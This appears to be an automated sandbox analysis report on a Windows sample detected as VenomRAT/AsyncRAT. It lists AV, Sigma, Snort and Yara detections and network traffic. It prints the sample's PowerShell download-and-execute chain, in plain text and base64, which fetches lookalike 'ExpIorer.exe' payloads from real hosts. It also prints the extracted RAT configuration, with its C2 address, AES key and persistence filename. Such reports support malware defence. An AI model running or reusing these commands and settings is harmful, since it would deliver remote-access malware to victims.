                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , ProcessId: 2108, ProcessName: powershell.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Powershell download and execute file
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe

                            Snort Signatures

                            Timestamp:05/26/24-09:46:59.108809
                            SID:2052265
                            Source Port:4449
                            Destination Port:49704
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: ZzOTKK2V8l.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeAvira: detection malicious, Label: HEUR/AGEN.1313069
                            Found malware configuration
                            Source: ZzOTKK2V8l.exeMalware Configuration Extractor: VenomRAT {"Server": "94.156.65.172", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "AntiMalware.exe", "AES_key": "jJXnCe880wpEw5c4UGtj4RyhmqzVM1cb", "Mutex": "izslwuidilziewad", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
                            Source: ZzOTKK2V8l.exeMalware Configuration Extractor: AsyncRAT {"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeReversingLabs: Detection: 50%
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeVirustotal: Detection: 55%Perma Link
                            Multi AV Scanner detection for submitted file
                            Source: ZzOTKK2V8l.exeReversingLabs: Detection: 50%
                            Source: ZzOTKK2V8l.exeVirustotal: Detection: 55%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: ZzOTKK2V8l.exeJoe Sandbox ML: detected
                            Source: ZzOTKK2V8l.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2052265 ET TROJAN Observed Malicious SSL Cert (VenomRAT) 94.156.65.172:4449 -> 192.168.2.5:49704
                            Source: global trafficTCP traffic: 192.168.2.5:49704 -> 94.156.65.172:4449
                            Source: Joe Sandbox ViewASN Name: TERASYST-ASBG TERASYST-ASBG
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.65.172
                            Source: global trafficDNS traffic detected: DNS query: xcu.exgaming.click
                            Source: global trafficDNS traffic detected: DNS query: xcu5.exgaming.click
                            Source: AntiMalware.exe, 00000012.00000002.4422664162.000000000103B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: AntiMalware.exe, 00000012.00000002.4422664162.000000000103B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.18.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: AntiMalware.exe, 00000012.00000002.4432828798.000000001C379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabi
                            Source: ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003651000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Contains functionality to log keystrokes (.Net Source)
                            Source: ZzOTKK2V8l.exe, Keylogger.cs.Net Code: KeyboardLayout
                            Source: AntiMalware.exe.0.dr, Keylogger.cs.Net Code: KeyboardLayout

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: ZzOTKK2V8l.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F43DCE NtProtectVirtualMemory,0_2_00007FF848F43DCE
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F33E3E NtProtectVirtualMemory,13_2_00007FF848F33E3E
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F13E3E NtProtectVirtualMemory,18_2_00007FF848F13E3E
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F43DCE0_2_00007FF848F43DCE
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F436DD0_2_00007FF848F436DD
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F33E3E13_2_00007FF848F33E3E
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F3374D13_2_00007FF848F3374D
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F13E3E18_2_00007FF848F13E3E
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1B1E218_2_00007FF848F1B1E2
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1A43618_2_00007FF848F1A436
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1EF4D18_2_00007FF848F1EF4D
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1FBDF18_2_00007FF848F1FBDF
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1812D18_2_00007FF848F1812D
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F19F3918_2_00007FF848F19F39
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F1374D18_2_00007FF848F1374D
                            Source: ZzOTKK2V8l.exeStatic PE information: No import functions for PE file found
                            Source: AntiMalware.exe.0.drStatic PE information: No import functions for PE file found
                            Source: ZzOTKK2V8l.exe, 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameClientx64.exe" vs ZzOTKK2V8l.exe
                            Source: ZzOTKK2V8l.exe, 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientx64.exe" vs ZzOTKK2V8l.exe
                            Source: ZzOTKK2V8l.exeBinary or memory string: OriginalFilenameClientx64.exe" vs ZzOTKK2V8l.exe
                            Source: ZzOTKK2V8l.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: ZzOTKK2V8l.exe, Program.csBase64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
                            Source: ZzOTKK2V8l.exe, Settings.csBase64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', 'XDXpkYhRS8WGYilk/4IwGqgzIW11grYJw7JapruAB0xrqC6zbbRDY7NHOxwXP6zyR2jqXaTgLCmIXQJ46iLAWlDB/egix4ythub7pRzZagwovoc96IeBfhPbXB7ZDAjTudVyp5KzXzNEJPyNwRRaqe5hY7OuL8chiYEU5i9QS8mafScnga6mHFJ88BeNqyizx1wkkCUr79P0eVi5U4hr1Zww1JYUYdJvzoTCyQ99BZHPd4ihZ9kmvVnlwSPsvMD+Wa+uWhyGUb7TdQElgF33aOli+SCVoCY8VOjbwbo82c0ZggzMI5flBv31eHJLFM4xm1xsHN4gFgtK0d3U04OS/mH9d0wPWsPkcoX6tgsPPt/XhcjNHFUx2Q21w2fYK4fehfY+9Zysw2vF7cGN1CbkJ/E1wPxUtjovRcNfwC3owD25sYiZpz42G4rRx04xlM+FniB+z4UApadENJuDmJjKJU7RPD29eDSsgRdUEhGj4ISu7BH7ne08/RsPjOSKVNRtdLn08+gEZTxAV7ldzVtt9lHMXDcMsLxdcNrvWgdth7fCUO+caJQMG67RS7nFdh9woxNrnsL6QCv3DgAdanvn0+2+Hw6/IG+aEJZjoJfzpbNoCLSZ6dGJCXbtwN0/LGKzgdi4HlTQxqqDWKOoKC3eWypqoj/dU8VSNnQgvR9VKXscsADepAZN39+Hh3k1RZqwNqtFKD0C9jR67YeIItM3zZVxgdH7aQfL2wL/woUFccfr580vtt3b3bAd4uYxvQJRmucI6gnBOm12vso6IhxXiHP3QnoQp5SKaTOIvyfTAtC6qEy22uzLSD1YI8nXWapaqoPf9UcGHTBo5jQLUfsakL3zp6LtWFjd6+Gax35w06GtNb7YxJmuurxp+HNQukAcrEdxcsWy46FxahqwT1txNMIb3DaIv9AzvrYwJZ9kQWQ5DBTlEYJE2qhjcy5Qx09upxM/FN6VqzPJcT7jTBAWE6qsBHrVdvj2EDPKdpXQD/Me5Mudu7qtK9hlXnQHDM7GYXKygtfjN3gzJcZ0dQG5G/0vGeuUaLkP+H8TetwxOIhtq09lhHeuM8YFWt25yDZ+', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='
                            Source: AntiMalware.exe.0.dr, Program.csBase64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
                            Source: AntiMalware.exe.0.dr, Settings.csBase64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', 'XDXpkYhRS8WGYilk/4IwGqgzIW11grYJw7JapruAB0xrqC6zbbRDY7NHOxwXP6zyR2jqXaTgLCmIXQJ46iLAWlDB/egix4ythub7pRzZagwovoc96IeBfhPbXB7ZDAjTudVyp5KzXzNEJPyNwRRaqe5hY7OuL8chiYEU5i9QS8mafScnga6mHFJ88BeNqyizx1wkkCUr79P0eVi5U4hr1Zww1JYUYdJvzoTCyQ99BZHPd4ihZ9kmvVnlwSPsvMD+Wa+uWhyGUb7TdQElgF33aOli+SCVoCY8VOjbwbo82c0ZggzMI5flBv31eHJLFM4xm1xsHN4gFgtK0d3U04OS/mH9d0wPWsPkcoX6tgsPPt/XhcjNHFUx2Q21w2fYK4fehfY+9Zysw2vF7cGN1CbkJ/E1wPxUtjovRcNfwC3owD25sYiZpz42G4rRx04xlM+FniB+z4UApadENJuDmJjKJU7RPD29eDSsgRdUEhGj4ISu7BH7ne08/RsPjOSKVNRtdLn08+gEZTxAV7ldzVtt9lHMXDcMsLxdcNrvWgdth7fCUO+caJQMG67RS7nFdh9woxNrnsL6QCv3DgAdanvn0+2+Hw6/IG+aEJZjoJfzpbNoCLSZ6dGJCXbtwN0/LGKzgdi4HlTQxqqDWKOoKC3eWypqoj/dU8VSNnQgvR9VKXscsADepAZN39+Hh3k1RZqwNqtFKD0C9jR67YeIItM3zZVxgdH7aQfL2wL/woUFccfr580vtt3b3bAd4uYxvQJRmucI6gnBOm12vso6IhxXiHP3QnoQp5SKaTOIvyfTAtC6qEy22uzLSD1YI8nXWapaqoPf9UcGHTBo5jQLUfsakL3zp6LtWFjd6+Gax35w06GtNb7YxJmuurxp+HNQukAcrEdxcsWy46FxahqwT1txNMIb3DaIv9AzvrYwJZ9kQWQ5DBTlEYJE2qhjcy5Qx09upxM/FN6VqzPJcT7jTBAWE6qsBHrVdvj2EDPKdpXQD/Me5Mudu7qtK9hlXnQHDM7GYXKygtfjN3gzJcZ0dQG5G/0vGeuUaLkP+H8TetwxOIhtq09lhHeuM8YFWt25yDZ+', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='
                            Source: ZzOTKK2V8l.exe, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ZzOTKK2V8l.exe, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: AntiMalware.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
